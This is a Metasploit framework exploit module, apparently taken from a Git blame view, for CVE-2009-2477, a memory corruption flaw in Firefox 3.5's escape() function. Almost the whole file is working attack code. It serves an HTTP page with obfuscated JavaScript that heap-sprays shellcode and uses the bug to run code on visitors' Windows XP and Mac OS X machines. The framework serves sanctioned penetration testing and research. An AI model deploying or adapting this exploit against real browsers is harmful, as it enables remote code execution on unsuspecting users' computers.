metasploit-framework/modules/exploits/multi/browser/firefox_escape_retval.rb

225 lines
5.6 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
2013-08-30 21:28:54 +00:00
Rank = NormalRanking
#
# This module acts as an HTTP server
#
include Msf::Exploit::Remote::HttpServer::HTML
#include Msf::Exploit::Remote::BrowserAutopwn
#autopwn_info({
# :ua_name => HttpClients::FF,
# :ua_minver => "3.5",
# :ua_maxver => "3.5",
# :os_name => OperatingSystems::WINDOWS,
# :javascript => true,
# :rank => NormalRanking, # reliable memory corruption
# :vuln_test => nil,
#})
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'Firefox 3.5 escape() Return Value Memory Corruption',
'Description' => %q{
This module exploits a memory corruption vulnerability in the Mozilla
Firefox browser. This flaw occurs when a bug in the javascript interpreter
fails to preserve the return value of the escape() function and results in
uninitialized memory being used instead. This module has only been tested
on Windows, but should work on other platforms as well with the current
targets.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Simon Berry-Byrne <x00050876[at]itnet.ie>', # Author / Publisher / Original exploit
'hdm', # Metasploit conversion
],
'References' =>
[
['CVE', '2009-2477'],
['OSVDB', '55846'],
['BID', '35660'],
['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=503286']
],
'Payload' =>
{
'Space' => 1000 + (rand(256).to_i * 4),
'BadChars' => "\x00",
},
'Platform' => %w{ win osx },
2013-08-30 21:28:54 +00:00
'Targets' =>
[
[ 'Firefox 3.5.0 on Windows XP SP0-SP3',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
'Ret' => 0x0c0c0c0c,
'BlockLen' => 0x60000,
'Containers' => 800,
}
],
[ 'Firefox 3.5.0 on Mac OS X 10.5.7 (Intel)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
'Ret' => 0x41414141,
'BlockLen' => 496,
'Containers' => 800000
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 13 2009'
))
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
print_status("Sending #{self.name}")
send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html; charset=utf-8' })
handler(cli)
end
def generate_html(payload)
enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))
enc_ret = Rex::Text.to_unescape(
Rex::Arch.endian(target.arch) == ENDIAN_LITTLE ? [target.ret].pack('V') : [target.ret].pack('N')
)
var_data_str1 = Rex::Text.rand_text_alpha(3)
var_data_str2 = Rex::Text.rand_text_alpha(4)
js = <<-EOF
var xunescape = unescape;
var shellcode = xunescape("#{enc_code}");
oneblock = xunescape("#{enc_ret}");
var fullblock = oneblock;
while (fullblock.length < #{target['BlockLen']})
{
2013-08-30 21:28:54 +00:00
fullblock += fullblock;
}
var sprayContainer = new Array();
var sprayready = false;
var sprayContainerIndex = 0;
function fill_function()
{
2013-08-30 21:28:54 +00:00
if(! sprayready) {
for (xi=0; xi<#{target['Containers']}/100; xi++, sprayContainerIndex++)
{
sprayContainer[sprayContainerIndex] = fullblock + shellcode;
}
} else {
DataTranslator();
GenerateHTML();
}
if(sprayContainer.length >= #{target['Containers']}) {
sprayready = true;
}
}
var searchArray = new Array();
function escapeData(data)
{
2013-08-30 21:28:54 +00:00
var xi;
var xc;
var escData='';
for(xi=0; xi<data.length; xi++)
{
xc=data.charAt(xi);
if(xc=='&' || xc=='?' || xc=='=' || xc=='%' || xc==' ') xc = escape(xc);
escData+=xc;
}
return escData;
}
function DataTranslator()
{
2013-08-30 21:28:54 +00:00
searchArray = new Array();
searchArray[0] = new Array();
searchArray[0]["#{var_data_str1}"] = "#{var_data_str2}";
var newElement = document.getElementById("content");
if (document.getElementsByTagName) {
var xi=0;
pTags = newElement.getElementsByTagName("p");
if (pTags.length > 0)
while (xi < pTags.length)
{
oTags = pTags[xi].getElementsByTagName("font");
searchArray[xi+1] = new Array();
if (oTags[0]) {
searchArray[xi+1]["#{var_data_str1}"] = oTags[0].innerHTML;
}
xi++;
}
}
}
function GenerateHTML()
{
2013-08-30 21:28:54 +00:00
var xhtml = "";
for (xi=1;xi<searchArray.length;xi++)
{
xhtml += escapeData(searchArray[xi]["#{var_data_str1}"]);
}
}
setInterval("fill_function()", .5);
EOF
2013-08-30 21:28:54 +00:00
# Obfuscate it up a bit
js = obfuscate_js(js, 'Symbols' => {
'Variables' => %W{ DataTranslator GenerateHTML escapeData xunescape
shellcode oneblock fullblock sprayContainer xi searchArray xc
escData xhtml pTags oTags newElement sprayready sprayContainerIndex
fill_function }
}).to_s
2013-08-30 21:28:54 +00:00
str1 = Rex::Text.rand_text_alpha(20)
str2 = Rex::Text.rand_text_alpha(24)
str3 = Rex::Text.rand_text_alpha(10) + " "
2013-08-30 21:28:54 +00:00
return %Q^
<html>
<head>
<div id="content">
<p>
<FONT>
</FONT>
</p>
<p>
<FONT>#{str1}</FONT></p>
<p>
<FONT>#{str2}</FONT>
</p>
<p>
<FONT>#{str3}</FONT>
</p>
</div>
<script language="JavaScript">
#{js}
</script>
</body>
</html>
^
2013-08-30 21:28:54 +00:00
end
end